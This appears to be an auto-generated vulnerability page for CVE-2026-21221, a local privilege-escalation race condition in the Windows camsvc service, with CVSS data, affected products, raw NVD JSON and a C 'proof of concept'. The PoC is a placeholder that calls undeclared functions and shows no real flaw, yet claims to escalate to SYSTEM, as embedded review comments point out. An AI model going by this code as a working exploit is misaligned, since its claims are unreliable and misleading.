Security Vulnerability Report
CVE-2026-21221 CVSS 7.0 HIGH

CVE-2026-21221

Published: 2026-01-13 18:16:25
Last Modified: 2026-01-16 16:48:12

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:* - VULNERABLE
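Also listed, without a CPE entry or status marker (the NVD configuration data in the raw JSON below contains only the five CPEs above, so confirm these against the vendor advisory):
Windows 10 1809/1903/1909/2004/20H2/21H1/21H2/22H2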
Windows 11 21H2/22H2
Windows Server 2019
Windows Server 2022
Windows Server Core 2019/2022

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-21221 PoC - Race Condition in camsvc
// This is a conceptual PoC demonstrating the TOCTOU race condition
// Run with low privileges to escalate to SYSTEM
//
// Language: C (C11 <threads.h> plus Win32 headers).
//
// NOTE(review): CAM_REQUEST, SendRequest, ManipulateResourceState,
// CompleteRequest, OpenServiceHandle and CheckElevatedPrivileges are not
// declared anywhere in this listing and do not appear to be Win32 API names,
// so the code cannot compile or run as shown. system() is also used without
// <stdlib.h>. The listing carries no detail about the actual flaw in camsvc:
// read it as an illustrative template, not as evidence of exploitability and
// not as a basis for detection signatures.
//
// NOTE(review): for triage, rely on the advisory data on this page instead:
// CWE-362 / CWE-416, CVSS vector AV:L/AC:H/PR:L, and the versionEndExcluding
// builds in the raw JSON, which mark the patched builds per product.
#include <windows.h>
#include <stdio.h>
#include <threads.h>

#define MAX_THREADS 16   // number of worker threads started by exploit_cve_2026_21221()
#define ITERATIONS 10000 // loop count per worker thread

// Flag read by every worker. It is set to TRUE once, before any thread is
// created, and never cleared, so the guarded branch in race_thread() is taken
// on every iteration. volatile is not a synchronization primitive.
volatile BOOL g_trigger = FALSE;

// Handle shared by all workers; assigned from the undeclared
// OpenServiceHandle() and released with CloseHandle().
HANDLE g_camsvc_handle = NULL;

// Thread function to trigger race condition
//
// arg points to an int holding the worker's id. The function loops ITERATIONS
// times, filling a CAM_REQUEST and passing it to the placeholder request
// calls. Always returns 0.
int race_thread(void* arg) {
    int thread_id = *(int*)arg;

    for (int i = 0; i < ITERATIONS; i++) {
        // Send concurrent requests to camsvc
        // NOTE(review): CAM_REQUEST is undeclared; only the two fields
        // assigned below are visible here.
        CAM_REQUEST req;
        req.thread_id = thread_id;
        req.timestamp = GetTickCount();

        // Step 1: Initial request
        SendRequest(g_camsvc_handle, &req);

        // Step 2: Rapidly trigger conditions
        if (g_trigger) {
            // Manipulate shared state during TOCTOU window
            // NOTE(review): placeholder call with no arguments and no
            // definition; which state or window is meant is not shown.
            ManipulateResourceState();
        }

        // Step 3: Complete request with elevated context
        // NOTE(review): nothing visible in this listing establishes an
        // elevated context; the claim rests on the undeclared helper.
        CompleteRequest(g_camsvc_handle, &req);
    }

    return 0;
}

// Main exploitation logic
//
// Opens the shared handle, starts MAX_THREADS workers running race_thread(),
// joins them all, then asks CheckElevatedPrivileges() for the outcome.
// Returns TRUE only when that undeclared check returns non-zero; returns FALSE
// when the handle cannot be opened or the check fails.
BOOL exploit_cve_2026_21221() {
    printf("[*] CVE-2026-21221 camsvc Race Condition Exploit\n");
    printf("[*] Target: Windows Capability Access Management Service\n");

    // Open handle to camsvc
    g_camsvc_handle = OpenServiceHandle("camsvc");
    if (!g_camsvc_handle) {
        printf("[-] Failed to open camsvc handle\n");
        return FALSE;
    }

    printf("[*] Starting race condition attack...\n");
    g_trigger = TRUE;

    // Launch multiple threads to create race condition
    thrd_t threads[MAX_THREADS];
    int thread_ids[MAX_THREADS]; // one id slot per thread; each worker gets a pointer to its own slot

    for (int i = 0; i < MAX_THREADS; i++) {
        thread_ids[i] = i;
        thrd_create(&threads[i], race_thread, &thread_ids[i]);
    }

    // Wait for threads and check for success
    BOOL exploited = FALSE;
    for (int i = 0; i < MAX_THREADS; i++) {
        thrd_join(threads[i], NULL);
    }

    // NOTE(review): the success messages below depend entirely on an
    // undeclared helper; the listing shows no mechanism by which privileges
    // would change.
    if (CheckElevatedPrivileges()) {
        printf("[+] Race condition exploited successfully!\n");
        printf("[+] Running with elevated privileges\n");
        exploited = TRUE;
    } else {
        printf("[-] Exploitation failed, try again\n");
    }

    CloseHandle(g_camsvc_handle);
    return exploited;
}

// Entry point: prints a banner, runs exploit_cve_2026_21221() and, on a TRUE
// result, runs whoami. Always returns 0.
int main() {
    printf("CVE-2026-21221 PoC - camsvc Local Privilege Escalation\n");
    printf("==================================================\n");

    if (exploit_cve_2026_21221()) {
        // Spawn SYSTEM shell
        // NOTE(review): this runs `whoami` through cmd.exe, which prints the
        // account of the calling process. It does not open a shell or change
        // privileges by itself.
        system("cmd.exe /c whoami");
    }

    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21221", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:24.723", "lastModified": "2026-01-16T16:48:12.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally."}, {"lang": "es", "value": "Ejecución concurrente utilizando un recurso compartido con sincronización inadecuada (condición de carrera) en el Servicio de Gestión de Acceso a Capacidades (camsvc) permite a un atacante autorizado elevar privilegios localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "208734FD-5175-4856-9D08-ED6CFF64AA14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "846261D4-ECC2-4DCB-8F8F-F27F8C99F061"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": 
"33E138A3-968B-4109-AC13-D488685F0AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "CC1FE5A1-3E6E-4606-899B-BF7BF3D3DD8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32230", "matchCriteriaId": "D44880ED-E8E9-49A8-BD56-503C63D40000"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21221", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}